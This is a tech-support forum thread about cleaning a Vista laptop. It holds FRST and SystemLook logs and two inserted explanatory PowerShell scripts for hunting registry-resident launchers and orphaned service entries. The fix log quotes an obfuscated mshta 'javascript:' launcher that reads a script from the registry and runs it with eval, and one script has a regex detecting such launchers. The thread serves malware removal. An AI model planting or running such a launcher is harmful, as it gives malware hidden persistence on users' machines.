    iaStor.sys
    ipinip.sys
  • Click the Look button to start the scan.
  • Please be patient, as it may take a while.
  • When finished, a Notepad file will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt

------------------------------------------------------
chemist is offline  
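The Software\Classes\13cb9 entry under the user's hive in the fixlist above is a registry-resident launcher: mshta.exe is handed a "javascript:" URL that creates a WScript.Shell object, reads another registry value (HKCU\software\lgduy\ulqvtwy) with RegRead, and passes whatever it finds there to eval. The real payload therefore lives in the registry rather than in a file, which is how a file-based scan can come back clean while the persistence survives. The log excerpt does not show what invokes the launcher, and this example does not guess. The script below is an added example, not part of the thread and not code from FRST, for hunting this pattern on a live machine: it walks the Software\Classes subkeys of the chosen hives, flags values that look like an mshta/script-host launcher, follows any RegRead target to dump a preview of the stored payload, and deletes nothing unless run with -Remove. The hive list, the detection regex, the -Remove switch and the function names are my choices, not anything from the page.

```powershell
# Added example (not from the thread or from FRST): hunt for registry-resident
# mshta "javascript:" launchers like the Software\Classes\13cb9 entry in the fixlist.
# Run from an elevated 64-bit PowerShell. Read-only unless -Remove is supplied.
[CmdletBinding()]
param(
    # Hives to walk (assumption); HKLM\Software\Classes is large, so expect a slow run.
    [string[]]$Hives = @('HKCU:\Software\Classes', 'HKLM:\Software\Classes'),
    [switch]$Remove
)

# Launcher signature (assumption): mshta with a javascript:/vbscript: URL, a WScript.Shell
# object, or an eval( call stored inside a registry value.
$launcherPattern = '(?i)mshta\.exe.*\b(javascript|vbscript):|ActiveXObject\("WScript\.Shell"\)|\beval\('
# Captures the argument of RegRead("HKCU\\software\\x\\y") so the payload value can be dumped.
$regReadPattern  = '(?i)RegRead\("([^"]+)"\)'

function Convert-ScriptRegPath {
    # Turn the RegRead argument (JS-escaped backslashes, short hive names) into a
    # PowerShell key path plus value name.
    param([string]$RawPath)
    $p = $RawPath -replace '\\\\', '\'
    $p = $p -replace '^HKCU\\', 'HKCU:\' -replace '^HKEY_CURRENT_USER\\', 'HKCU:\' `
            -replace '^HKLM\\', 'HKLM:\' -replace '^HKEY_LOCAL_MACHINE\\', 'HKLM:\'
    $idx = $p.LastIndexOf('\')
    [pscustomobject]@{ Key = $p.Substring(0, $idx); Value = $p.Substring($idx + 1) }
}

function Find-RegistryLauncher {
    param([string]$Hive)
    if (-not (Test-Path -Path $Hive)) { return }
    foreach ($key in (Get-ChildItem -Path $Hive -ErrorAction SilentlyContinue)) {
        # Inspect the key's own values and, if present, its shell\open\command subkey.
        $paths = @($key.PSPath)
        $cmdKey = Join-Path -Path $key.PSPath -ChildPath 'shell\open\command'
        if (Test-Path -Path $cmdKey) { $paths += $cmdKey }
        foreach ($path in $paths) {
            $props = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue
            if ($null -eq $props) { continue }
            foreach ($prop in $props.PSObject.Properties) {
                # PS* are provider metadata, not registry values; "(default)" is the key's default value.
                if ($prop.Name -like 'PS*' -or $prop.Value -isnot [string]) { continue }
                if ($prop.Value -notmatch $launcherPattern) { continue }
                $payloadKey = $null; $payloadValue = $null; $payload = $null
                if ($prop.Value -match $regReadPattern) {
                    $t = Convert-ScriptRegPath -RawPath $Matches[1]
                    $payloadKey = $t.Key; $payloadValue = $t.Value
                    $payload = (Get-ItemProperty -Path $t.Key -Name $t.Value -ErrorAction SilentlyContinue).($t.Value)
                }
                [pscustomobject]@{
                    Key            = $key.Name
                    ValueName      = $prop.Name
                    Launcher       = $prop.Value
                    PayloadKey     = $payloadKey
                    PayloadValue   = $payloadValue
                    PayloadPreview = if ($payload -is [string]) { $payload.Substring(0, [Math]::Min(200, $payload.Length)) } else { $payload }
                }
            }
        }
    }
}

$findings = @(foreach ($hive in $Hives) { Find-RegistryLauncher -Hive $hive })
if ($findings.Count -eq 0) { Write-Output 'No mshta/script-host launchers found in the scanned Classes hives.'; return }
$findings | Format-List

if ($Remove) {
    foreach ($f in $findings) {
        # Delete the launcher key and the stored payload value. Take a registry backup or
        # restore point first, as the fixlist above does with createrestorepoint:.
        Remove-Item -Path ("Registry::" + $f.Key) -Recurse -Force -ErrorAction Continue
        if ($f.PayloadKey -and (Test-Path -Path $f.PayloadKey)) {
            Remove-ItemProperty -Path $f.PayloadKey -Name $f.PayloadValue -Force -ErrorAction Continue
        }
    }
}
```

Review the PayloadPreview before removing anything: a legitimate application can register a protocol handler under Software\Classes, so the match on mshta plus a registry-stored script is the signal, not the Classes key by itself. Keep the dumped payload for analysis, since deleting the key destroys the only copy of it.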
Old 12-24-2016, 12:26 PM   #12
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



The system had been slow and while I waited I inquired what new OS I might upgrade to in another thread. Turns out 2 GB of my RAM wasn't working. Fixed that by removing them and placing them back in the opposite slots. I figure one came loose. Otherwise the machine is running well. Faster now than it has been :)


Fix result of Farbar Recovery Scan Tool (x64) Version: 21-12-2016
Ran by Me (24-12-2016 12:18:46) Run:1
Running from C:\Users\Me\Desktop\fix
Loaded Profiles: Me (Available Profiles: Me)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
createrestorepoint:
Task: {1FF86DA0-1AF2-4032-88A4-F8882C4552AB} - \DriverDocRunAtStartup -> No File <==== ATTENTION
Task: {597B495C-7D2A-4C09-9473-E34D0C324223} - \DriverDoc_UPDATES -> No File <==== ATTENTION
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Classes\13cb9: "C:\Windows\system32\mshta.exe" "javascript:e0ldi7ba="7Q";E0B1=new ActiveXObject("WScript.Shell");FZc9QGI6="JoO3na";AqP8o3=E0B1.RegRead("HKCU\\software\\lgduy\\ulqvtwy");WB97YbhTf="08QxfG";eval(AqP8o3);AOM8kr="h06uuXT";" <===== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
EmptyTemp:
end
*****************

Restore point was successfully created.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1FF86DA0-1AF2-4032-88A4-F8882C4552AB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1FF86DA0-1AF2-4032-88A4-F8882C4552AB}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DriverDocRunAtStartup => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{597B495C-7D2A-4C09-9473-E34D0C324223}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{597B495C-7D2A-4C09-9473-E34D0C324223}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DriverDoc_UPDATES => key not found.
"HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Classes\13cb9" => key removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 40340880 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 12093 B
Edge => 0 B
Chrome => 0 B
Firefox => 39167449 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66228 B
systemprofile32 => 66228 B
LocalService => 0 B
LocalService => 0 B
NetworkService => 654100 B
NetworkService => 0 B
Me => 5753713 B

RecycleBin => 0 B
EmptyTemp: => 90.1 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 12:19:27 ====


SystemLook 30.07.11 by jpshortstuff
Log created at 12:22 on 24/12/2016 by Me
Administrator - Elevation successful

========== reg ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Beep]
"ErrorControl"= 0x0000000001 (1)
"Group"="Base"
"Start"= 0x0000000001 (1)
"Tag"= 0x0000000002 (2)
"Type"= 0x0000000001 (1)


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor]
"Type"= 0x0000000001 (1)
"Start"= 0x0000000000 (0)
"ErrorControl"= 0x0000000001 (1)
"Tag"= 0x0000000019 (25)
"ImagePath"="system32\DRIVERS\iaStor.sys"
"DisplayName"="Intel AHCI Controller"
"Group"="SCSI Miniport"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters]
"queuePriorityEnable"= 0x0000000000 (0)
"BusType"= 0x0000000003 (3)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port0]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port1]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port2]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port3]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port4]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Parameters\Port5]
"AN"= 0x0000000000 (0)
"LPM"= 0x0000000000 (0)
"LPMSTATE"= 0x0000000000 (0)
"LPMDSTATE"= 0x0000000001 (1)
"GTF"= 0x0000000001 (1)
"DIPM"= 0x0000000001 (1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iaStor\Enum]
"0"="Root\LEGACY_IASTOR\0000"
"Count"= 0x0000000001 (1)
"NextInstance"= 0x0000000001 (1)


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\IpInIp]
"Type"= 0x0000000001 (1)
"Start"= 0x0000000003 (3)
"ErrorControl"= 0x0000000001 (1)
"ImagePath"="system32\DRIVERS\ipinip.sys"
"DisplayName"="IP in IP Tunnel Driver"
"DependOnService"="Tcpip"
"Description"="IP in IP Tunnel Driver"


========== filefind ==========

Searching for "beep.sys"
No files found.

Searching for "iaStor.sys"
No files found.

Searching for "ipinip.sys"
No files found.

-= EOF =-


Thank You :) Merry Christmas
win98forever is offline  
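Several entries in the FRST log earlier in the thread end in [X] (hpqcxs08, IAANTMON, iaStor, IpInIp, NwlnkFlt, NwlnkFwd) and the Beep driver is listed with no ImagePath; FRST uses [X] for a service or driver whose registered file it could not find, and the SystemLook filefind above confirms that beep.sys, iaStor.sys and ipinip.sys are not on disk. The thread draws no conclusion about these entries and neither does this example. The script below is an added example, not part of the thread and not code from FRST or SystemLook, that reproduces the check on a live machine: it normalises every ImagePath form found under CurrentControlSet\Services (quoted paths with arguments, \??\ and \SystemRoot\ prefixes, paths relative to the Windows directory, and the no-ImagePath case) and reports entries whose binary or ServiceDll is missing. The function names and the Type mask are my choices.

```powershell
# Added example (not from the thread or from FRST): list service and driver entries whose
# binary is missing from disk, which FRST marks with [X] and SystemLook's filefind confirmed.
# Run from 64-bit PowerShell on a 64-bit OS; a 32-bit host sees system32 redirected to
# SysWOW64 and misreports drivers.

function Resolve-ImagePath {
    # Normalise the ImagePath forms found under CurrentControlSet\Services to an absolute file path.
    param([string]$ImagePath, [string]$ServiceName)
    if ([string]::IsNullOrWhiteSpace($ImagePath)) {
        # A driver with no ImagePath (like Beep above) is loaded from System32\drivers\<name>.sys.
        return (Join-Path -Path $env:SystemRoot -ChildPath "System32\drivers\$ServiceName.sys")
    }
    $p = [Environment]::ExpandEnvironmentVariables($ImagePath.Trim())
    # Drop NT object-manager prefixes used by driver entries (\??\C:\..., \SystemRoot\...).
    $p = $p -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"
    # Keep only the executable: a quoted path, or an unquoted path up to .exe/.sys/.dll.
    if ($p -match '^"([^"]+)"') { $p = $Matches[1] }
    elseif ($p -match '(?i)^(.*?\.(exe|sys|dll))(\s|$)') { $p = $Matches[1] }
    # Relative entries (system32\DRIVERS\iaStor.sys) are relative to the Windows directory.
    if (-not [IO.Path]::IsPathRooted($p)) { $p = Join-Path -Path $env:SystemRoot -ChildPath $p }
    return $p
}

function Get-OrphanedServiceEntry {
    param([string]$Root = 'HKLM:\SYSTEM\CurrentControlSet\Services')
    foreach ($key in (Get-ChildItem -Path $Root -ErrorAction SilentlyContinue)) {
        $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        # Type 0x1/0x2 = kernel/file-system driver, 0x10/0x20 = Win32 service; skip everything else.
        if ($null -eq $props -or $null -eq $props.Type -or ($props.Type -band 0x33) -eq 0) { continue }
        $image = Resolve-ImagePath -ImagePath $props.ImagePath -ServiceName $key.PSChildName
        # svchost-hosted services keep their real code in Parameters\ServiceDll.
        $dll = (Get-ItemProperty -Path (Join-Path -Path $key.PSPath -ChildPath 'Parameters') -ErrorAction SilentlyContinue).ServiceDll
        if ($dll) { $dll = [Environment]::ExpandEnvironmentVariables($dll) }
        $imageMissing = -not (Test-Path -LiteralPath $image -PathType Leaf)
        $dllMissing   = $dll -and -not (Test-Path -LiteralPath $dll -PathType Leaf)
        if ($imageMissing -or $dllMissing) {
            [pscustomobject]@{
                Name       = $key.PSChildName
                Start      = $props.Start      # 0 boot, 1 system, 2 auto, 3 demand, 4 disabled (FRST's S0..S4)
                Type       = ('0x{0:x}' -f $props.Type)
                ImagePath  = $props.ImagePath
                Resolved   = $image
                ServiceDll = $dll
                Missing    = @(if ($imageMissing) { 'image' }; if ($dllMissing) { 'servicedll' }) -join ','
            }
        }
    }
}

# Boot- and system-start drivers (Start 0 or 1) with no file on disk are the ones to look at first.
Get-OrphanedServiceEntry | Sort-Object Start, Name | Format-Table -AutoSize
```

A missing file does not by itself say whether the entry is a leftover from uninstalled software or the residue of something that was deleted; compare the entry's timestamps and DisplayName with what is actually installed before removing it, and prefer a tool that takes a restore point, as the FRST fix above did.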
Old 12-24-2016, 09:00 PM   #13
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, win98forever. You're very welcome. Merry Christmas. :)

Quote:
while I waited I inquired what new OS I might upgrade to in another thread
I would highly suggest you upgrade. VISTA wasn't good to begin with, is very old, and in my opinion, is not worth fixing anymore.

Are you going to upgrade?

------------------------------------------------------
chemist is offline  
Old 12-24-2016, 09:53 PM   #14
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Eventually when I have the money.
win98forever is offline  
Old 12-25-2016, 09:00 AM   #15
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Are we done?
This morning I noticed the scheduled scan in MSE had not started, so I manually updated it and am running a scan I started by hand. I can only assume something is wrong there, since it worked for years auto-updating and auto-scanning until the update issue started a few months ago.
win98forever is offline  
Old 12-25-2016, 07:50 PM   #16
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Not yet. Try uninstalling Security Essentials, rebooting, and reinstalling. Let me know.

Also, run FRST again, making sure the Addition.txt box is ticked, and post/attach the logs as before. Thanks.
chemist is offline  
Old 12-26-2016, 08:59 AM   #17
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



I ran the scan with MSE uninstalled. I reinstalled it and it seems frozen during the update about a quarter of the way along the indicator bar. This is the same thing it does when I am having update problems with it.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-12-2016
Ran by Me (administrator) on ME-PC (26-12-2016 08:43:01)
Running from C:\Users\Me\Desktop
Loaded Profiles: Me (Available Profiles: Me)
Platform: Windows Vista (TM) Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Windows\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\Toshiba\ConfigFree\NDSTray.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\Toshiba\ConfigFree\CFSwMgr.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [431968 2008-02-06] (TOSHIBA Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1573160 2008-08-14] (Synaptics, Inc.)
HKLM\...\Run: [SmoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-06-02] (TOSHIBA Corporation)
HKLM\...\Run: [Skytel] => C:\Windows\Skytel.exe [1826816 2007-11-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RAVCpl64.exe [6156288 2008-04-08] (Realtek Semiconductor)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52560 2007-12-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [865280 2008-05-09] (TOSHIBA Corporation)
HKLM-x32\...\Run: [NDSTray.exe] => NDSTray.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2015-05-10]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.toshibadirect.com/dpdstart
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKLM -> {433BB3A7-874E-436B-BD51-239C6921FE98} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage};
SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000 -> {56B663A7-8091-4EF3-A706-11C321B76ABB} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-10-30] (Ghostery, Inc.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-19] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-19] (Oracle Corporation)
Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)
Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 [2016-12-26]
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> Bing
FF Homepage: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> about:home
FF NetworkProxy: Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897 -> type", 0
FF Extension: (Adblock Plus Pop-up Addon) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-04-27]
FF Extension: (Ghostery) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-11-29]
FF Extension: (Facebook™ Disconnect) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\[email protected] [2016-09-06]
FF Extension: (Flagfox) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b}.xpi [2016-12-16]
FF Extension: (NoScript) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-11-29]
FF Extension: (Adblock Plus) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-23]
FF Extension: (BetterPrivacy) - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\Extensions\{d40f5e7b-d2cf-4856-b441-cc613eeffbe3}.xpi [2016-10-31]
FF SearchPlugin: C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\searchplugins\yahoo-ysp.xml [2015-11-23]
FF ProfilePath: C:\Users\Me\AppData\Roaming\kompozer.net\KompoZer\Profiles\rx44r1ux.default [2015-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-05-10] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-19] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-19] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2008-04-03] (TOSHIBA Corporation.) [File not signed]
S4 ConfigFree Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe [40960 2008-04-16] (TOSHIBA CORPORATION) [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
S4 jswpsapi; C:\Program Files (x86)\Jumpstart\jswpsapi.exe [954368 2008-04-16] (Atheros Communications, Inc.) [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [3272656 2014-07-21] (Paramount Software UK Ltd)
S4 SmartFaceVWatchSrv; C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatchSrv.exe [84992 2008-04-24] (Toshiba) [File not signed]
S4 TNaviSrv; C:\Program Files (x86)\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2008-07-18] (TOSHIBA Corporation)
S4 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed]
S4 TOSHIBA SMART Log Service; C:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe [175104 2007-12-03] (TOSHIBA Corporation) [File not signed]
